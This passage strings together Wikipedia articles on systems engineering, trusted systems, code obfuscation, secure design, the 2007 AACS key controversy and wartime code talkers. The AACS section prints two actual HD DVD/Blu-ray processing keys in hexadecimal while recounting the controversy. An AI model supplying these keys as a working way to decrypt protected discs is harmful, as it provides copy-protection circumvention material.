mathematical, physical, and social sciences together with the principles and methods of engineering analysis and design to specify, predict, and evaluate results obtained from such systems. Production Systems Engineering (PSE) is an emerging branch of Engineering intended to uncover fundamental principles of production systems and utilize them for analysis, continuous improvement, and design.[50] Interface designand its specification are concerned with assuring that the pieces of a system connect and inter-operate with other parts of the system and with external systems as necessary. Interface design also includes assuring that system interfaces are able to accept new features, including mechanical, electrical, and logical interfaces, including reserved wires, plug-space, command codes, and bits in communication protocols. This is known asextensibility.Human-Computer Interaction(HCI) or Human-Machine Interface (HMI) is another aspect of interface design and is a critical aspect of modern systems engineering. Systems engineering principles are applied in the design ofcommunication protocolsforlocal area networksandwide area networks. Mechatronic engineering, like systems engineering, is a multidisciplinary field of engineering that uses dynamic systems modeling to express tangible constructs. In that regard, it is almost indistinguishable from Systems Engineering, but what sets it apart is the focus on smaller details rather than larger generalizations and relationships. As such, both fields are distinguished by the scope of their projects rather than the methodology of their practice. Operations researchsupports systems engineering. Operations research, briefly, is concerned with the optimization of a process under multiple constraints.[51][52] Performance engineeringis the discipline of ensuring a system meets customer expectations for performance throughout its life. Performance is usually defined as the speed with which a certain operation is executed or the capability of executing a number of such operations in a unit of time. Performance may be degraded when operations queued to execute are throttled by limitedsystem capacity. For example, the performance of apacket-switched networkis characterized by the end-to-end packet transit delay or the number of packets switched in an hour. The design of high-performance systems uses analytical or simulation modeling, whereas the delivery of high-performance implementation involves thorough performance testing. Performance engineering relies heavily onstatistics,queueing theory, andprobability theoryfor its tools and processes. Program management(or project management) has many similarities with systems engineering, but has broader-based origins than the engineering ones of systems engineering.Project managementis also closely related to both program management and systems engineering. Both includeschedulingas engineering support tool in assessing interdisciplinary concerns under management process. In particular, the direct relationship of resources, performance features, and risk to the duration of a task or thedependencylinks among tasks and impacts across thesystem lifecycleare systems engineering concerns. Proposal engineering is the application of scientific and mathematical principles to design, construct, and operate a cost-effective proposal development system. Basically, proposal engineering uses the "systems engineering process" to create a cost-effective proposal and increase the odds of a successful proposal. Reliability engineeringis the discipline of ensuring a system meets customer expectations for reliability throughout its life (i.e. it does not fail more frequently than expected). Next to the prediction of failure, it is just as much about the prevention of failure. Reliability engineering applies to all aspects of the system. It is closely associated withmaintainability,availability(dependabilityorRAMSpreferred by some), andintegrated logistics support. Reliability engineering is always a critical component of safety engineering, as infailure mode and effects analysis(FMEA) andhazard fault treeanalysis, and ofsecurity engineering. Risk management, the practice of assessing and dealing withriskis one of the interdisciplinary parts of Systems Engineering. In development, acquisition, or operational activities, the inclusion of risk in tradeoffs with cost, schedule, and performance features, involves the iterative complex configuration management of traceability and evaluation to the scheduling and requirements management across domains and for thesystem lifecyclethat requires the interdisciplinary technical approach of systems engineering. Systems Engineering has Risk Management define, tailor, implement, and monitor a structured process for risk management which is integrated into the overall effort.[53] The techniques ofsafety engineeringmay be applied by non-specialist engineers in designing complex systems to minimize the probability of safety-critical failures. The "System Safety Engineering" function helps to identify "safety hazards" in emerging designs and may assist with techniques to "mitigate" the effects of (potentially) hazardous conditions that cannot be designed out of systems. Security engineeringcan be viewed as aninterdisciplinaryfield that integrates thecommunity of practicefor control systems design, reliability, safety, and systems engineering. It may involve such sub-specialties asauthenticationof system users, system targets, and others: people, objects, and processes. From its beginnings,software engineeringhas helped shape modern systems engineering practice. The techniques used in the handling of the complexities of large software-intensive systems have had a major effect on the shaping and reshaping of the tools, methods, and processes of Systems Engineering.
https://en.wikipedia.org/wiki/Systems_engineering
In thesecurity engineeringsubspecialty ofcomputer science, atrusted systemis one that is relied upon to a specified extent to enforce a specifiedsecurity policy. This is equivalent to saying that a trusted system is one whose failure would break a security policy (if a policy exists that the system is trusted to enforce). The word "trust" is critical, as it does not carry the meaning that might be expected in everyday usage. A trusted system is one that the user feels safe to use, and trusts to perform tasks without secretly executing harmful or unauthorized programs; trusted computing refers to whether programs can trust the platform to be unmodified from the expected, and whether or not those programs are innocent ormaliciousor whether they execute tasks that are undesired by the user. A trusted system can also be seen as a level-based security system where protection is provided and handled according to different levels. This is commonly found in the military, where information is categorized as unclassified (U), confidential (C), secret (S), top secret (TS), and beyond. These also enforce the policies of no read-up and no write-down. A subset of trusted systems ("Division B" and "Division A") implementmandatory access control(MAC) labels, and as such, it is often assumed that they can be used for processingclassified information. However, this is generally untrue. There are four modes in which one can operate a multilevel secure system: multilevel, compartmented, dedicated, and system-high modes. The National Computer Security Center's "Yellow Book" specifies that B3 and A1 systems can only be used for processing a strict subset of security labels, and only when operated according to a particularly strict configuration. Central to the concept ofU.S. Department of Defense-style trusted systems is the notion of a "reference monitor", which is an entity that occupies the logical heart of the system and is responsible for all access control decisions. Ideally, the reference monitor is According to the U.S.National Security Agency's 1983Trusted Computer System Evaluation Criteria(TCSEC), or "Orange Book", a set of "evaluation classes" were defined that described the features and assurances that the user could expect from a trusted system. The dedication of significant system engineering toward minimizing the complexity (notsize, as often cited) of thetrusted computing base(TCB) is key to the provision of the highest levels of assurance (B3 and A1). This is defined as that combination of hardware, software, and firmware that is responsible for enforcing the system's security policy. An inherent engineering conflict would appear to arise in higher-assurance systems in that, the smaller the TCB, the larger the set of hardware, software, and firmware that lies outside the TCB and is, therefore, untrusted. Although this may lead the more technically naive to sophists' arguments about the nature of trust, the argument confuses the issue of "correctness" with that of "trustworthiness". TCSEC has a precisely defined hierarchy of six evaluation classes; the highest of these, A1, is featurally identical to B3—differing only in documentation standards. In contrast, the more recently introducedCommon Criteria(CC), which derive from a blend of technically mature standards from variousNATOcountries, provide a tenuous spectrum of seven "evaluation classes" that intermix features and assurances in a non-hierarchical manner, and lack the precision and mathematical stricture of the TCSEC. In particular, the CC tolerate very loose identification of the "target of evaluation" (TOE) and support – even encourage – an inter-mixture of security requirements culled from a variety of predefined "protection profiles." While a case can be made that even the seemingly arbitrary components of the TCSEC contribute to a "chain of evidence" that a fielded system properly enforces its advertised security policy, not even the highest (E7) level of the CC can truly provide analogous consistency and stricture of evidentiary reasoning.[citation needed] The mathematical notions of trusted systems for the protection of classified information derive from two independent but interrelated corpora of work. In 1974, David Bell and Leonard LaPadula of MITRE, under the technical guidance and financial sponsorship of Maj. Roger Schell, Ph.D., of the U.S. Army Electronic Systems Command (Fort Hanscom, MA), devised theBell–LaPadula model, in which a trustworthy computer system is modeled in terms ofobjects(passive repositories or destinations for data such as files, disks, or printers) andsubjects(active entities that cause information to flow among objectse.g.users, or system processes or threads operating on behalf of users). The entire operation of a computer system can indeed be regarded as a "history" (in the serializability-theoretic sense) of pieces of information flowing from object to object in response to subjects' requests for such flows. At the same time, Dorothy Denning atPurdue Universitywas publishing her Ph.D. dissertation, which dealt with "lattice-based information flows" in computer systems. (A mathematical "lattice" is apartially ordered set, characterizable as adirected acyclic graph, in which the relationship between any two vertices either "dominates", "is dominated by," or neither.) She defined a generalized notion of "labels" that are attached to entities—corresponding more or less to the full security markings one encounters on classified military documents,e.g.TOP SECRET WNINTEL TK DUMBO. Bell and LaPadula integrated Denning's concept into their landmark MITRE technical report—entitled,Secure Computer System: Unified Exposition and Multics Interpretation. They stated that labels attached to objects represent the sensitivity of data contained within the object, while those attached to subjects represent the trustworthiness of the user executing the subject. (However, there can be a subtle semantic difference between the sensitivity of the data within the object and the sensitivity of the object itself.) The concepts are unified with two properties, the "simple security property" (a subject can only read from an object that itdominates[is greater thanis a close, albeit mathematically imprecise, interpretation]) and the "confinement property," or "*-property" (a subject can only write to an object that dominates it). (These properties are loosely referred to as "no read-up" and "no write-down," respectively.) Jointly enforced, these properties ensure that information cannot flow "downhill" to a repository where insufficiently trustworthy recipients may discover it. By extension, assuming that the labels assigned to subjects are truly representative of their trustworthiness, then the no read-up and no write-down rules rigidly enforced by the reference monitor are sufficient to constrainTrojan horses, one of the most general classes of attacks (sciz., the popularly reportedwormsandvirusesare specializations of the Trojan horse concept). The Bell–LaPadula model technically only enforces "confidentiality" or "secrecy" controls,i.e.they address the problem of the sensitivity of objects and attendant trustworthiness of subjects to not inappropriately disclose it. The dual problem of "integrity" (i.e. the problem of accuracy, or even provenance of objects) and attendant trustworthiness of subjects to not inappropriately modify or destroy it, is addressed by mathematically affine models; the most important of which is named for its creator,K. J. Biba. Other integrity models include theClark-Wilson modeland Shockley and Schell's program integrity model, "The SeaView Model"[1] An important feature of MACs, is that they are entirely beyond the control of any user. The TCB automatically attaches labels to any subjects executed on behalf of users and files they access or modify. In contrast, an additional class of controls, termeddiscretionary access controls(DACs),areunder the direct control of system users. Familiar protection mechanisms such aspermission bits(supported by UNIX since the late 1960s and – in a more flexible and powerful form – byMulticssince earlier still) andaccess control list(ACLs) are familiar examples of DACs. The behavior of a trusted system is often characterized in terms of a mathematical model. This may be rigorous depending upon applicable operational and administrative constraints. These take the form of afinite-state machine(FSM) with state criteria, statetransition constraints(a set of "operations" that correspond to state transitions), and adescriptive top-level specification, DTLS (entails a user-perceptibleinterfacesuch as anAPI, a set ofsystem callsinUNIXorsystem exitsinmainframes). Each element of the aforementioned engenders one or more model operations. TheTrusted Computing Groupcreates specifications that are meant to address particular requirements of trusted systems, including attestation of configuration and safe storage of sensitive information. In the context ofnationalorhomeland security,law enforcement, orsocial controlpolicy, trusted systems provide conditionalpredictionabout the behavior of people or objects prior to authorizing access to system resources.[2]For example, trusted systems include the use of "security envelopes" in national security and counterterrorism applications, "trusted computing" initiatives in technical systems security, andcredit or identity scoringsystems in financial and anti-fraud applications. In general, they include any system in which The widespread adoption of these authorization-based security strategies (where the default state is DEFAULT=DENY) for counterterrorism, anti-fraud, and other purposes is helping accelerate the ongoing transformation of modern societies from a notionalBeccarianmodel ofcriminal justicebased on accountability for deviant actions after they occur[3]to aFoucauldianmodel based on authorization, preemption, and general social compliance through ubiquitous preventativesurveillanceand control through system constraints.[4] In this emergent model, "security" is not geared towardspolicingbut torisk managementthrough surveillance, information exchange,auditing, communication, andclassification. These developments have led to general concerns about individualprivacyandcivil liberty, and to a broaderphilosophicaldebate about appropriate social governance methodologies. Trusted systems in the context ofinformation theoryare based on the following definition: "Trust is that which is essential to a communication channel but cannot be transferred from a source to a destination using that channel" In information theory, information has nothing to do with knowledge or meaning; it is simply that which is transferred from source to destination, using a communication channel. If, before transmission, the information is available at the destination, then the transfer is zero. Information received by a party is that which the party does not expect—as measured by the uncertainty of the party as to what the message will be. Likewise, trust as defined by Gerck, has nothing to do with friendship, acquaintances, employee-employer relationships, loyalty, betrayal and other overly-variable concepts. Trust is not taken in the purely subjective sense either, nor as a feeling or something purely personal or psychological—trust is understood as something potentially communicable. Further, this definition of trust is abstract, allowing different instances and observers in a trusted system to communicate based on a common idea of trust (otherwise communication would be isolated in domains), where all necessarily different subjective and intersubjective realizations of trust in each subsystem (man and machines) may coexist.[6] Taken together in the model of information theory, "information is what you do not expect" and "trust is what you know". Linking both concepts, trust is seen as "qualified reliance on received information". In terms of trusted systems, an assertion of trust cannot be based on the record itself, but on information from other information channels.[7]The deepening of these questions leads to complex conceptions of trust, which have been thoroughly studied in the context of business relationships.[8]It also leads to conceptions of information where the "quality" of information integrates trust or trustworthiness in the structure of the information itself and of the information system(s) in which it is conceived—higher quality in terms of particular definitions of accuracy and precision means higher trustworthiness.[9] An example of the calculus of trust is "If I connect two trusted systems, are they more or less trusted when taken together?".[6] TheIBMFederal Software Group[10]has suggested that "trust points"[5]provide the most useful definition of trust for application in an information technology environment, because it is related to other information theory concepts and provides a basis for measuring trust. In a network-centric enterprise services environment, such a notion of trust is considered[10]to be requisite for achieving the desired collaborative, service-oriented architecture vision.
https://en.wikipedia.org/wiki/Trusted_system
Code morphingis an approach used inobfuscating softwareto protectsoftwareapplications fromreverse engineering,analysis, modifications, and cracking. This technology protects intermediate level code such as compiled from Java and .NET languages (Oxygene,C#,Visual Basic, etc.) rather than binaryobject code. Code morphing breaks up the protected code into several processor commands or small command snippets and replaces them by others, while maintaining the same end result. Thus the protector obfuscates the code at the intermediate level.[1] Code morphing is a multilevel technology containing hundreds of unique code transformation patterns. In addition this technology transforms some intermediate layer commands intovirtual machinecommands (likep-code). Code morphing does not protect against runtime tracing, which can reveal the execution logic of any protected code. Unlike other code protectors, there is no concept of codedecryptionwith this method. Protected code blocks are always in the executable state, and they are executed (interpreted) as transformed code. The original intermediate code is absent to a certain degree, but deobfuscation can still give a clear view of the original code flow. Code morphing is also used to refer to thejust-in-time compilationtechnology used inTransmetaprocessors such as theCrusoeandEfficeonto implement thex86instruction set architecture. Code morphing is often used in obfuscating thecopy protectionor other checks that a program makes to determine whether it is a valid, authentic installation, or anunauthorized copy, in order to make the removal of the copy-protection code more difficult than would otherwise be the case.
https://en.wikipedia.org/wiki/Code_morphing
Insoftware development,obfuscationis the practice of creatingsourceormachine codethat is intentionally difficult for humans or computers to understand. Similar toobfuscationinnatural language, code obfuscation may involve using unnecessarily roundabout ways to write statements. Programmers often obfuscate code to conceal its purpose, logic, or embedded values. The primary reasons for doing so are to preventtampering, deterreverse engineering, or to create apuzzleor recreational challenge to deobfuscate the code, a challenge often included incrackmes. While obfuscation can be done manually, it is more commonly performed usingobfuscators.[1] The architecture and characteristics of some languages may make them easier to obfuscate than others.[2][3]C,[4]C++,[5][6]and thePerlprogramming language[7]are some examples of languages easy to obfuscate.Haskellis also quite obfuscatable[8]despite being quite different in structure. The properties that make a language obfuscatable are not immediately obvious. Types of obfuscations include simple keyword substitution, use or non-use of whitespace to create artistic effects, and self-generating or heavily compressed programs. According toNick Montfort, techniques may include: A variety of tools exist to perform or assist with code obfuscation. These include experimental research tools developed by academics, hobbyist tools, commercial products written by professionals, andopen-source software. Additionally, deobfuscation tools exist, aiming to reverse the obfuscation process. While most commercial obfuscation solutions transform either program source code or platform-independent bytecode,i.e.portable code (as used byJavaand.NET), some also work directly on compiled binaries. Writing and reading obfuscated source code can be abrain teaser. A number of programming contests reward the most creatively obfuscated code, such as theInternational Obfuscated C Code Contestand theObfuscated Perl Contest. Short obfuscatedPerlprograms may be used insignaturesof Perl programmers. These are JAPHs ("Just another Perl hacker").[16] Cryptographers have explored the idea of obfuscating code so that reverse-engineering the code iscryptographicallyhard. This is formalized in the many proposals forindistinguishability obfuscation, a cryptographic primitive that, if possible to build securely, would allow one to construct many other kinds of cryptography, including completely novel types that no one knows how to make. (A stronger notion,black-box obfuscation, is known to be impossible in general.)[17][18] Some anti-virus softwares, such asAVG AntiVirus,[20]will also alert their users when they land on a website with code that is manually obfuscated, as one of the purposes of obfuscation can be to hide malicious code. However, some developers may employ code obfuscation for the purpose of reducing file size or increasing security. The average user may not expect their antivirus software to provide alerts about an otherwise harmless piece of code, especially from trusted corporations, so such a feature may actually deter users from using legitimate software. Mozilla and Google disallow browser extensions containing obfuscated code in their add-ons store.[21][22] There has been debate on whether it is illegal to skirtcopyleftsoftware licensesby releasing source code in obfuscated form, such as in cases in which the author is less willing to make the source code available. The issue is addressed in theGNU General Public Licenseby requiring the "preferred form for making modifications" to be made available.[23]The GNU website states "Obfuscated 'source code' is not real source code and does not count as source code."[24] Adecompileris a tool that can reverse-engineer source code from an executable or library. This process is sometimes referred to as a man-in-the-end (mite) attack, inspired by the traditional "man-in-the-middle attack" in cryptography. The decompiled source code is often hard to read, containing random function and variable names, incorrect variable types, and logic that differs from the original source code due to compiler optimizations. Model obfuscationis a technique to hide the internal structure of amachine learningmodel.[25]Obfuscation turns a model into a black box. It is contrary toexplainable AI. Obfuscation models can also be applied to training data before feeding it into the model to add random noise. This hides sensitive information about the properties of individual and groups of samples.[26]
https://en.wikipedia.org/wiki/Obfuscation_(software)
Secure by design, insoftware engineering, means that software products and capabilities have beendesignedto be foundationallysecure. Alternate security strategies, tactics and patterns are considered at the beginning of a software design, and the best are selected and enforced by the architecture, and they are used as guiding principles fordevelopers.[1]It is also encouraged to use strategic design patterns that have beneficial effects onsecurity, even though those design patterns were not originally devised with security in mind.[2] Secure by Design is increasingly becoming the mainstream development approach to ensure security andprivacyof software systems. In this approach, security is considered and built into the system at every layer and starts with a robust architecture design. Security architectural design decisions are based on well-known security strategies, tactics, and patterns defined as reusable techniques for achieving specific quality concerns. Security tactics/patterns provide solutions for enforcing the necessaryauthentication, authorization, confidentiality,data integrity, privacy, accountability, availability, safety and non-repudiation requirements, even when the system is under attack.[3]In order to ensure the security of a software system, not only is it important to design a robust intended security architecture but it is also necessary to map updated security strategies, tactics and patterns to software development in order to maintain security persistence. Malicious attacks on software should be assumed to occur, and care is taken to minimize impact. Security vulnerabilities are anticipated, along with invaliduserinput.[4]Closely related is the practice of using "good" software design, such asdomain-driven designorcloud native, as a way to increase security by reducing risk of vulnerability-opening mistakes—even though the design principles used were not originally conceived for security purposes. Generally, designs that work well do notrely on being secret. Often, secrecy reduces the number of attackers by demotivating a subset of the threat population. The logic is that if there is an increase in complexity for the attacker, the increased attacker effort to compromise the target will discourage them. While this technique implies reduced inherent risks, a virtually infinite set of threat actors and techniques applied over time will cause most secrecy methods to fail. While not mandatory, proper security usually means that everyone is allowed to know and understand the designbecause it is secure. This has the advantage that many people are looking at thesource code, which improves the odds that any flaws will be found sooner (seeLinus's law). The disadvantage is that attackers can also obtain the code, which makes it easier for them to findvulnerabilitiesto exploit. It is generally believed, though, that the advantage of the open source code outweighs the disadvantage. Also, it is important that everything works with the fewestprivilegespossible (see theprinciple of least privilege). For example, aweb serverthat runs as theadministrative user("root" or "admin") can have the privilege to remove files and users. A flaw in such a program could therefore put the entire system at risk, whereas a web server that runs inside anisolated environment, and only has the privileges for requirednetworkandfilesystemfunctions, cannot compromise the system it runs on unless the security around it in itself is also flawed. Secure Design should be a consideration during the development lifecycle (whicheverdevelopment methodologyis chosen). Some pre-built Secure By Design development methodologies exist (e.g.Microsoft Security Development Lifecycle). Standards and Legislation exist to aide secure design by controlling the definition of "Secure", and providing concrete steps to testing and integrating secure systems. Some examples of standards which cover or touch on Secure By Design principles: In server/client architectures, the program at the other side may not be an authorised client and the client's server may not be an authorised server. Even when they are, aman-in-the-middle attackcould compromise communications. Often the easiest way to break the security of a client/server system is not to go head on to the security mechanisms, but instead to go around them. A man in the middle attack is a simple example of this, because you can use it to collect details to impersonate a user. Which is why it is important to considerencryption,hashing, and other security mechanisms in your design to ensure that information collected from a potential attacker won't allow access. Another key feature to client-server security design isgood coding practices. For example, following a known software design structure, such as client and broker, can help in designing a well-built structure with a solid foundation. Furthermore, if the software is to be modified in the future, it is even more important that it follows a logical foundation of separation between the client and server. This is because if a programmer comes in and cannot clearly understand the dynamics of the program, they may end up adding or changing something that can add a security flaw. Even with the best design, this is always a possibility, but the better the standardization of the design, the less chance there is of this occurring.
https://en.wikipedia.org/wiki/Secure_by_design
A controversy surrounding theAACSprocessing key arose in April 2007 when theMotion Picture Association of Americaand theAdvanced Access Content System Licensing Administrator, LLC (AACS LA) began issuingcease and desistletters[7]to websites publishing a 128-bit(16-byte)number, represented inhexadecimalas09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0[8][9](commonly referred to as09 F9),[10][11]acryptographickeyforHD DVDsandBlu-ray Discs. The letters demanded the immediate removal of the key and any links to it, citing the anti-circumvention provisions of the United StatesDigital Millennium Copyright Act(DMCA). In response to widespread Internet postings of the key, the AACS LA issued various press statements, praising websites that complied with their requests for acting in a "responsible manner" and warning that "legal and technical tools" were adapting to the situation. The controversy was further escalated in early May 2007, when aggregate news siteDiggreceived a DMCAcease and desistnotice and then removed numerous articles on the matter andbannedusers from reposting the information.[12]This sparked what some describe as a digital revolt[13]or "cyber-riot"[14]in which users posted and spread the key on Digg, and throughout the Interneten masse, leading to aStreisand effect. The AACS LA described this situation as an "interesting new twist".[15] Because the encryption key may be used as part ofcircumvention technologyforbidden by theDMCA, its possession and distribution has been viewed as illegal by theAACS, as well as by some legal professionals.[7][16]Since it is a128-bitnumericalvalue, it was dubbed anillegal number.[17][18][19]Opponents to the expansion of the scope ofcopyrightcriticize the idea of making a particular number illegal.[20] Commercial HD DVDs and Blu-ray discs integrate copy protection technology specified by the AACS LA. There are several interlocking encryption mechanisms, such that cracking one part of the system does not necessarily crack other parts. Therefore, the "09 F9" key is only one of many parts that are needed to play a disc on an unlicensed player. AACS can be used to revoke a key of a specific playback device, after it is known to have been compromised, as it has forWinDVD.[21]The compromised players can still be used to view old discs, but not newer releases without encryption keys for the compromised players. If other players are then cracked, further revocation would lead to legitimate users of compromised players being forced to upgrade or replace their player software orfirmwarein order to view new discs. Each playback device comes with abinary treeof secret device and processing keys. The processing key in this tree, a requirement to play the AACS encrypted discs, is selected based on the device key and the information on the disc to be played. As such, a processing key such as the "09 F9" key is not revoked, but newly produced discs cause the playback devices to select a different valid processing key to decrypt the discs.[22] On December 26, 2006, a person using the aliasmuslix64published a utility namedBackupHDDVDand itssource codeon the DVD decryptionforumat the websiteDoom9.[23]BackupHDDVD can be used to decrypt AACS protected content once one knows the encryption key.[24]muslix64 claimed to have found title and volume keys in main memory while playing HD DVDs using a software player, and that finding them is not difficult.[25] On January 1, 2007, muslix64 published a new version of the program, with volume key support.[26]On January 12, 2007, other forum members detailed how to find other title and volume keys, stating they had also found the keys of several movies inRAMwhile runningWinDVD. On or about January 13, a title key was posted onpastebin.comin the form of a riddle, which was solved by entering terms into theGooglesearch engine. By converting these results to hexadecimal, a correct key could be formed.[27]Later that day, the first cracked HD DVD,Serenity, was uploaded on a private torrent tracker.[28]The AACS LA confirmed on January 26 that the title keys on certain HD DVDs had been published without authorization.[29] Doom9.org forum userarnezamifound and published the "09 F9" AACS processing key on February 11: Nothing was hacked, cracked or even reverse-engineered btw: I only had to watch the "show" in my own memory. No debugger was used, no binaries changed. This key is not specific to any playback device or DVD title. Doom9.org forum userjx6bpmclaimed on March 4 to have revealedCyberLink'sPowerDVD's key, and that it was the key in use byAnyDVD.[31] The AACS LA announced on April 16 that it had revoked the decryption keys associated with certain software high-definition DVD players, which will not be able to decrypt AACS encrypted disks mastered after April 23, without an update of the software.[32][33] On May 17, one week before any discs with the updated processing key had reached retail, claims were reported of the new keys having been retrieved from a preview disc ofThe Matrix Trilogy.[34]On May 23, the key45 5F E1 04 22 CA 29 C4 93 3F 95 05 2B 79 2A B2was posted onEdward Felten'sFreedom to Tinker Blog[35]and confirmed a week later byarnezamion Doom9 as the new processing key (MKBv3).[36] As early as April 17, 2007, AACS LA had issuedDMCAviolation notices, sent by Charles S. Sims ofProskauer Rose.[37][38]Following this, dozens of notices were sent to various websites hosted in the United States.[39] On May 1, 2007, in response to a DMCA demand letter, technology news siteDiggbegan closing accounts and removing posts containing or alluding to the key. The Digg community reacted by creating a flood of posts containing the key, many using creative ways of disguising the key,[40][failed verification]by semi-directly or indirectly inserting the number, such as in song or images (either representing the digits pictorially or directly representing bytes from the key as colors) or on merchandise.[41]At one point, Digg's "entire homepage was covered with links to the HD-DVD code or anti-Digg references."[42]Eventually the Digg administrators reversed their position, with founder Kevin Rose stating: But now, after seeing hundreds of stories and reading thousands of comments, you've made it clear. You'd rather see Digg go down fighting than bow down to a bigger company. We hear you, and effective immediately we won't delete stories or comments containing the code and will deal with whatever the consequences might be.[43][44][45] Lawyers and other representatives of the entertainment industry, including Michael Avery, an attorney forToshibaCorporation, expressed surprise at Digg's decision, but suggested that a suit aimed at Digg might merelyspread the information more widely. If you try to stick up for what you have a legal right to do, and you're somewhat worse off because of it, that's an interesting concept. TheAmerican Bar Association'seReportpublished a discussion of the controversy,[47]in whichEric GoldmanatSanta Clara University's High Tech Law Institute noted that the illegality of putting the code up is questionable (thatSection 230 of the Communications Decency Actmay protect the provider when the material itself is not copyrighted), although continuing to allow posting of the key may be "risky", and entertainment lawyerCarole Handlernoted that even if the material is illegal, laws such as the DMCA may prove ineffective in a practical sense. In a response to the events occurring onDiggand the call to "Spread this number", the key was rapidly posted to thousands of pages, blogs andwikisacross the Internet.[48][49]The reaction was an example of theStreisand effect.[50] Intellectual propertylawyer Douglas J. Sorocco noted, "People are getting creative. It shows the futility of trying to stop this. Once the information is out there, cease-and-desist letters are going to infuriate this community more."[47]Outside the Internet and themass media, the key has appeared in or on T-shirts, poetry, songs and music videos, illustrations and other graphic artworks,[51]tattoos and body art,[52]and comic strips.[53]TheLinuxkernel also incorporated a copy of the key for 17.5 years, originally added in 2007 by David Woodhouse as part of thered zonelogic[54]and subsequently removed as a routine cleanup in 2024.[55] On Tuesday afternoon, May 1, 2007, aGooglesearch for the key returned 9,410 results,[56]while the same search the next morning returned nearly 300,000 results.[9]On Friday, theBBCreported that a search on Google shows almost 700,000 pages have published the key,[15]despite the fact that on April 17, the AACS LA sent a DMCA notice to Google, demanding that Google stop returning any results for searches for the key.[57][58] Widespread news coverage[42][59][44][60][61]included speculation on the development of user-driven websites,[62]the legal liability of running a user-driven website,[63]the perception of acceptance ofDRM,[64]the failure as a business model of "secrecy based businesses ... in every aspect" in the Internet era,[65]and the harm an industry can cause itself with harshly-perceived legal action.[66] In an opposing move, Carter Wood of theNational Association of Manufacturerssaid they had removed the "Digg It" link from their weblog:[67] Until the Digg community shows as much fervor in attacking intellectual piracy as attacking the companies that are legitimately defending their property, well, we do not want to be promoting the site by using the "Digg It" feature. Media coverage initially avoided quoting the key itself. However, several US-based news sources have run stories containing the key, quoting its use on Digg,[68][69][70][71][72][73]though none are known to have received DMCA notices as a result. Later reports have discussed this, quoting the key.[74]Current TVbroadcast the key during aGoogle Currentstory on the Digg incident on May 3, 2007, displaying it in full on screen for several seconds and placing the story on the station website.[75] On May 1, 2007,Wikipedialocked out the page named for the number "to prevent the former secret from being posted again". The page on HD DVD was locked as well, to keep out "The Number".[76]This action was later reversed. No one has been arrested or charged for finding or publishing the original key.[40][unreliable source?] On May 7, 2007, the AACS LA announced on its website that it had "requested the removal solely of illegal circumvention tools, including encryption keys, from a number of web sites", and that it had "not requested the removal or deletion of any ... discussion or commentary". The statement continued, "AACS LA is encouraged by the cooperation it has received thus far from the numerous web sites that have chosen to address their legal obligations in a responsible manner."[77]BBC Newshad earlier quoted an AACS executive saying thatbloggers"crossed the line", that AACS was looking at "legal and technical tools" to confront those who published the key, and that the events involving Digg were an "interesting new twist".[15]
https://en.wikipedia.org/wiki/AACS_encryption_key_controversy
Acode talkerwas a person employed by the military during wartime to use a little-known language as a means of secret communication. The term is most often used for United States service members during theWorld Warswho used their knowledge ofNative American languagesas a basis to transmit coded messages. In particular, there were approximately 400 to 500Native Americansin theUnited States Marine Corpswhose primary job was to transmit secrettacticalmessages. Code talkers transmitted messages over military telephone or radio communications nets using formally or informally developed codes built upon their indigenous languages. The code talkers improved the speed ofencryptionand decryption of communications infront lineoperations duringWorld War IIand are credited with some decisive victories. Their code was never broken. There were two code types used during World War II. Type one codes were formally developed based on the languages of theComanche,Hopi,Meskwaki, andNavajopeoples. They used words from their languages for each letter of the English alphabet. Messages could be encoded and decoded by using asimple substitution cipherwhere theciphertextwas the Native language word. Type two code was informal and directly translated from English into the Indigenous language. Code talkers used short, descriptive phrases if there was no corresponding word in the Indigenous language for the military word. For example, the Navajo did not have a word forsubmarine, so they translated it asiron fish.[1][2] The termCode Talkerwas originally coined by the United States Marine Corps and used to identify individuals who completed the special training required to qualify as Code Talkers. Their service records indicated "642 – Code Talker" as a duty assignment. Today, the term Code Talker is still strongly associated with the bilingualNavajospeakers trained in the Navajo Code during World War II by the US Marine Corps to serve in all sixdivisions of the Corpsand theMarine Raidersof thePacific theater. However, the use of Native American communicators pre-dates WWII. Early pioneers of Native American-based communications used by the US Military include theCherokee,Choctaw, andLakota peoplesduring World War I.[3]Today the term Code Talker includes military personnel from all Native American communities who have contributed their language skills in service to the United States. Other Native American communicators—now referred to as code talkers—were deployed by theUnited States Armyduring World War II, includingLakota,[4]Meskwaki,Mohawk,[5][6]Comanche,Tlingit,[7]Hopi,[8]Cree, andCrowsoldiers; they served in the Pacific, North African, and European theaters.[9] Native speakers of theAssiniboine languageserved as code talkers during World War II to encrypt communications.[10]One of these code talkers wasGilbert Horn Sr., who grew up in theFort Belknap Indian Reservationof Montana and became a tribal judge and politician.[10] In November 1952,Euzko Deyamagazine[11]reported that sometime in May 1942, upon meeting a large number of US Marines ofBasqueancestry in a San Francisco camp, CaptainFrank D. Carranzahad thought of using theBasque languagefor codes.[12][13][14]His superiors were concerned about risk, as there were known settlements of Basque people in the Pacific region, including 35 BasqueJesuitsinHiroshima, led byPedro Arrupe; a colony of Basquejai alaiplayers in China and the Philippines; and Basque supporters ofFalangein Asia. Consequently, the US Basque code talkers were not deployed in these theaters; instead, they were used initially in tests and in transmitting logistics information for Hawaii and Australia. According toEuzko Deya, on August 1, 1942, Lieutenants Nemesio Aguirre, Fernández Bakaicoa, and Juanana received a Basque-coded message from San Diego for AdmiralChester Nimitz. The message warned Nimitz ofOperation Appleto remove the Japanese from theSolomon Islands. They also translated the start date, August 7, forthe attack on Guadalcanal. As the war extended over the Pacific, there was a shortage of Basque speakers, and the US military came to prefer the parallel program based on the use of Navajo speakers. In 2017, Pedro Oiarzabal and Guillermo Tabernilla published a paper refutingEuzko Deya's article.[15]According to Oiarzabal and Tabernilla, they could not find Carranza, Aguirre, Fernández Bakaicoa, or Juanana in theNational Archives and Records Administrationor US Army archives. They did find a small number of US Marines withBasque surnames, but none of them worked in transmissions. They suggest that Carranza's story was anOffice of Strategic Servicesoperation to raise sympathy for US intelligence among Basque nationalists. The US military's first known use of code talkers was during World War I.Cherokeesoldiers of the US30th Infantry Divisionfluent in theCherokee languagewere assigned to transmit messages while under fire during theSecond Battle of the Somme. According to the Division Signal Officer, this took place in September 1918 when their unit was under British command.[16][17] DuringWorld War I, company commander Captain Lawrence of the US Army overheard Solomon Louis and Mitchell Bobb having a conversation inChoctaw. Upon further investigation, he found eightChoctawmen served in the battalion. The Choctaw men in the Army's36th Infantry Divisionwere trained to use their language in code. They helped theAmerican Expeditionary Forcesin several battles of theMeuse-Argonne Offensive. On October 26, 1918, the code 